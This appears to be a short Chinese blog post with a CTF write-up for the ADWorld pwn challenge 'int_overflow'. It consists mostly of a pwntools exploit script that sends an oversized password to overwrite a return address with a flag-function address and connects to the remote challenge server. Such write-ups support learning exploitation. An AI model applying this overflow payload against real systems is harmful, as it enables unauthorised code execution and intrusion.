ADWorld Pwn int_overflow

整数溢出的题目,之前从没做过,所以看了WriteUp。

1
2
3
4
5
6
7
8
9
from pwn import *
p = remote("111.198.29.45",56345)
p.sendlineafter("Your choice:","1")
p.sendlineafter("username:","123")
flagAddr=0x0804868B
payload=b'0'*(0x14+0x4)+p32(flagAddr)+b'0'*(0x105-0x8-0x14)
print(len(payload))
p.sendlineafter("passwd:",payload)
p.interactive()

发表评论

电子邮件地址不会被公开。 必填项已用*标注